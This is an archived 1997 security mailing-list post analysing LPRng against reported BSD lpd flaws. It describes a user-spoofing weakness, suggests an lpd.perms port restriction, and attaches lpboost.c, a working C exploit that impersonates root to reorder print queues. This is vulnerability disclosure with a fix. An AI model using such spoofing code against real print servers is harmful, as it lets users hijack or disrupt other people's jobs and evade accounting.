home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / Exploit and vulnerability / hoobie / lpboost.c < prev    next >
Encoding:
C/C++ Source or Header  |  2001-11-06  |  7.2 KB  |  214 lines
  1.  
  2. Hi all,
  3.  
  4. I just looked into LPRng to see to what extent it is affected by the
  5. problems recently reported for the BSD lpd. It seems that it is fairly
  6. safe from those mentioned in the SNI advisory.
  7.  
  8. > Problem 1: File creation
  9. >
  10. > Individuals with access to the line printer daemon from a privileged
  11. > port on a valid print client can tell lpd to create a file, providing
  12. > the name of the file, including directory names, is no longer than 5
  13. > characters.
  14.  
  15. LPRng checks that data and control file names conform to the spool file
  16. format: [cf]dNNNhostname, where hostname must contain only alphanumeric
  17. characters or "-_.".
  18.  
  19. > Problem 2: File deletion
  20. >
  21. > Individuals with access to the line printer daemon from a privileged
  22. > port on a valid print client can tell lpd to remove any file on the
  23. > system.
  24.  
  25. When given the U option, lpd checks that it follows a data file
  26. (e.g. f option), and that the names match.
  27.  
  28. > Problem 3: Remote execution
  29. >
  30. > Individuals with access to the line printer daemon from a privileged
  31. > port on a valid print client can execute commands remotely as the
  32. > user which lpd is running as.  This vulnerability can allow
  33. > interactive shell access to the remote system.
  34.  
  35. The LPRng lpd purges all meta characters (everything but alphanums
  36. and "-_.@/:()=,+-% \t"), executes sendmail via execve, and does so
  37. under the daemon uid. As a consequence, you're not allowed to specify
  38. alternate config files etc.
  39.  
  40. The only glitch is that, as daemon is usually trusted by sendmail, you're
  41. able to specify the sender address using the -f option (which makes it
  42. the most painful way of address spoofing I've come across:-). Also,
  43. LPRng permits only one M command per print job, so there's no way of
  44. mailbombing.
  45.  
  46. There's a different security problem, at least in the default
  47. configuration shipped by Caldera, which is that lpd doesn't check
  48. for privileged ports by default, and blindly accepts any user name
  49. the lpr client provides.
  50.  
  51. I'm including a small exploit to demonstrate this problem. It lets
  52. Joe User move any print job to the top of the print queue. To test
  53. it, it may be best to create a dummy printer, disable printing to it,
  54. and create some print jobs (by different users). Note that while this
  55. exploit is pretty harmless, other exploits (such as redirecting
  56. printers or circumventing the accounting system) are not.
  57.  
  58. One way to fix that would be to restrict the the range of ports
  59. from which clients are permitted to connect by putting the following
  60. into /etc/lpd.perms (right before all other non-comment statements):
  61.  
  62. REJECT SERVICE=X NOT PORT=512-1023
  63.  
  64. and stop and restart the printer daemon.
  65.  
  66. Note that restricting the valid range of ports to 512-1023 also
  67. stops FTP bounce attacks (bounce attacks don't apply if you install
  68. the most recent wu-ftpd fix).
  69.  
  70. However, this fails miserably since all lp clients are installed
  71. without suid root permissions (at least by Caldera). This seems to be a
  72. design decision made by the author. OTOH he has put a lot of work into
  73. the accounting stuff which is quite worthless if lpd can be spoofed
  74. that easily.
  75.  
  76. Now, the lpr clients seem to work also with setuid enabled (and at first
  77. glance, setuid privileges seem to be handled quite carefully). We're
  78. currently looking into this. Anybody would like to share their experience
  79. with making LPRng setuid root?
  80.  
  81. Cheers
  82. Olaf
  83.  
  84. PS: Excercise to the reader:-) Problems like this can be solved using
  85. the SCM_CREDENTIALS stuff in 2.1.x kernels. Lpr can authenticate itself
  86. with the local lpd via a unix socket, and have lpd forward the job to
  87. the remote printer using a privileged port. Any takers?
  88. --
  89. Olaf Kirch         |  --- o --- Nous sommes du soleil we love when we play
  90. okir@monad.swb.de  |    / | \   sol.dhoop.naytheet.ah kin.ir.samse.qurax
  91. okir@caldera.com   +-------------------- Why Not?! -----------------------
  92.  
  93. --hhlLboLdkugWU4S2
  94. Content-Type: TEXT/PLAIN; CHARSET=us-ascii
  95. Content-ID: <Pine.SUN.3.94.971020194800.9833H@dfw.dfw.net>
  96. Content-Description: Print queue? What queue?
  97.  
  98. /*
  99.  * lpboost.c
  100.  *
  101.  * Simple exploit to demonstrate problem with PLP/LPRng user
  102.  * `authentication': boost your print job's priority by moving it
  103.  * to the top of the queue.
  104.  *
  105.  * This is the most harmless exploit of this problem. More serious
  106.  * ones include circumvention of the accounting system, killing other
  107.  * users' jobs, shutting down printers, redirecting them, etc.
  108.  *
  109.  * Copyright (C) 1997, Olaf Kirch <okir@lst.de>
  110.  */
  111. #include <sys/types.h>
  112. #include <sys/socket.h>
  113. #include <netinet/in.h>
  114. #include <arpa/inet.h>
  115. #include <netdb.h>
  116. #include <string.h>
  117. #include <stdio.h>
  118. #include <unistd.h>
  119. #include <errno.h>
  120.  
  121. static int      doconnect(char *hostname);
  122. static void     dosend(int fd, unsigned char ch, char *string);
  123.  
  124. int
  125. main(int argc, char **argv)
  126. {
  127.         char    buffer[8192];
  128.         char    hostbuf[256], *hostname = hostbuf;
  129.         int     fd;
  130.  
  131.         if (argc == 4) {
  132.                 hostname = argv[3];
  133.         } else if (argc != 3) {
  134.                 fprintf(stderr, "usage: lpboost <printer> <job> [hostname]\n");
  135.                 exit(1);
  136.         } else {
  137.                 /* If lpd.perms allows queue manipulation only from
  138.                  * the local host (SERVER keyword), must use FQDN
  139.                  * rather than localhost (127.0.0.1) */
  140.                 gethostname(hostbuf, sizeof(hostbuf));
  141.         }
  142.  
  143.         if ((fd = doconnect(hostname)) < 0) {
  144.                 fprintf(stderr, "Failed to connect to %s: %s\n",
  145.                         hostname, strerror(errno));
  146.                 exit(1);
  147.         }
  148.  
  149.         /* Assemble control message */
  150.         sprintf(buffer, "%s %s topq %s %s",
  151.                         argv[1],        /* printer */
  152.                         "root",         /* user */
  153.                         argv[1],        /* printer */
  154.                         argv[2]);       /* job # */
  155.  
  156.         /* Transmit control message and pick up status */
  157.         dosend(fd, 6, buffer);
  158.  
  159.         exit (0);
  160. }
  161.  
  162. static int
  163. doconnect(char *hostname)
  164. {
  165.         struct hostent  *hp;
  166.         struct sockaddr_in sin;
  167.         int             fd;
  168.  
  169.         if (!(hp = gethostbyname(hostname))) {
  170.                 fprintf(stderr, "%s: unknown host\n", hostname);
  171.                 exit(1);
  172.         }
  173.  
  174.         memset(&sin, 0, sizeof(sin));
  175.         sin.sin_family = AF_INET;
  176.         sin.sin_addr = *(struct in_addr *) hp->h_addr;
  177.         sin.sin_port = htons(515);
  178.  
  179.         if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
  180.                 perror("socket");
  181.                 exit(1);
  182.         }
  183.         if (connect(fd, (struct sockaddr *) &sin, sizeof(sin)) < 0) {
  184.                 perror("connect");
  185.                 exit(1);
  186.         }
  187.  
  188.         return fd;
  189. }
  190.  
  191. static void
  192. dosend(int fd, unsigned char ch, char *string)
  193. {
  194.         char    buffer[256], cr = '\n';
  195.         int     slen = string? strlen(string) : 0;
  196.  
  197.         if (write(fd, &ch, 1) != 1 ||
  198.             (string && (write(fd, string, slen) != slen
  199.                      || write(fd, &cr, 1) != 1))) {
  200.                 perror("write");
  201.                 exit(1);
  202.         }
  203.  
  204.         while ((slen = read(fd, buffer, sizeof(buffer)-1)) > 0) {
  205.                 buffer[slen] = '\0';
  206.                 fprintf(stderr, "lpd: %s\n", buffer);
  207.         }
  208.         if (slen == 0 || errno == EPIPE)
  209.                 return;
  210.         perror("read (errmsg)");
  211.         exit(1);
  212. }
  213.  
  214.